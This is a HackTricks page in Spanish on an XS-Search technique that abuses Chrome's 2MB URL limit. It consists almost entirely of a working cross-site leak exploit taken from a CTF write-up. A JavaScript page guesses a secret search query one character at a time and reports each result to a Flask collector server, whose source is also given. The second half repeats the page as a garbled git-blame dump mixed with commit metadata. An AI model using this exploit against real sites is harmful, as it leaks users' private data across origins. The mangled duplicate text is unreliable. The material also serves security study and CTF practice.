hacktricks/pentesting-web/xs-search/url-max-length-client-side.md

# Longitud máxima de URL - Lado del Cliente

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres que tu **empresa sea anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

Código de [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
```html
<html>
<body></body>
<script>
(async () => {

const curr = "http://secrets.wtl.pw/search?query=HackTM{"

const leak = async (char) => {

fetch("/?try=" + char)
let w = window.open(curr + char +  "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2))

const check = async () => {
try {
w.origin
} catch {
fetch("/?nope=" + char)
return
}
setTimeout(check, 100)
}
check()
}

const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"

for (let i = 0; i < CHARSET.length; i++) {
leak(CHARSET[i])
await new Promise(resolve => setTimeout(resolve, 50))
}
})()
</script>
</html>
```
Lado del servidor:
```python
from flask import Flask, request

app = Flask(__name__)

CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
chars = []

@app.route('/', methods=['GET'])
def index():
global chars

nope = request.args.get('nope', '')
if nope:
chars.append(nope)

remaining = [c for c in CHARSET if c not in chars]

print("Remaining: {}".format(remaining))

return "OK"

@app.route('/exploit.html', methods=['GET'])
def exploit():
return open('exploit.html', 'r').read()

if __name__ == '__main__':
app.run(host='0.0.0.0', port=1337)
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres que tu **empresa sea anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:01 +00:00			`# Longitud máxima de URL - Lado del Cliente`
f 2023-06-05 20:33:24 +02:00
			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:01 +00:00			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres que tu empresa sea anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:37:14 +00:00			`* Obtén el [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 20:33:24 +02:00
			`</details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`Código de [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)`
f 2023-06-05 20:33:24 +02:00			```html
			`<html>`
			`<body></body>`
			`<script>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`(async () => {`

			`const curr = "http://secrets.wtl.pw/search?query=HackTM{"`

			`const leak = async (char) => {`

			`fetch("/?try=" + char)`
			`let w = window.open(curr + char + "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2))`

			`const check = async () => {`
			`try {`
			`w.origin`
			`} catch {`
			`fetch("/?nope=" + char)`
			`return`
			`}`
			`setTimeout(check, 100)`
			`}`
			`check()`
			`}`

			`const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"`

			`for (let i = 0; i < CHARSET.length; i++) {`
			`leak(CHARSET[i])`
			`await new Promise(resolve => setTimeout(resolve, 50))`
			`}`
			`})()`
f 2023-06-05 20:33:24 +02:00			`</script>`
			`</html>`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`Lado del servidor:`
f 2023-06-05 20:33:24 +02:00			```python
			`from flask import Flask, request`

			`app = Flask(__name__)`

			`CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"`
			`chars = []`

			`@app.route('/', methods=['GET'])`
			`def index():`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`global chars`

			`nope = request.args.get('nope', '')`
			`if nope:`
			`chars.append(nope)`
f 2023-06-05 20:33:24 +02:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`remaining = [c for c in CHARSET if c not in chars]`
f 2023-06-05 20:33:24 +02:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`print("Remaining: {}".format(remaining))`
f 2023-06-05 20:33:24 +02:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`return "OK"`
f 2023-06-05 20:33:24 +02:00
			`@app.route('/exploit.html', methods=['GET'])`
			`def exploit():`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`return open('exploit.html', 'r').read()`
f 2023-06-05 20:33:24 +02:00
			`if __name__ == '__main__':`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`app.run(host='0.0.0.0', port=1337)`
f 2023-06-05 20:33:24 +02:00			```
			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:01 +00:00			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres que tu empresa sea anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:37:14 +00:00			`* Obtén el [swag oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
f 2023-06-05 20:33:24 +02:00			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`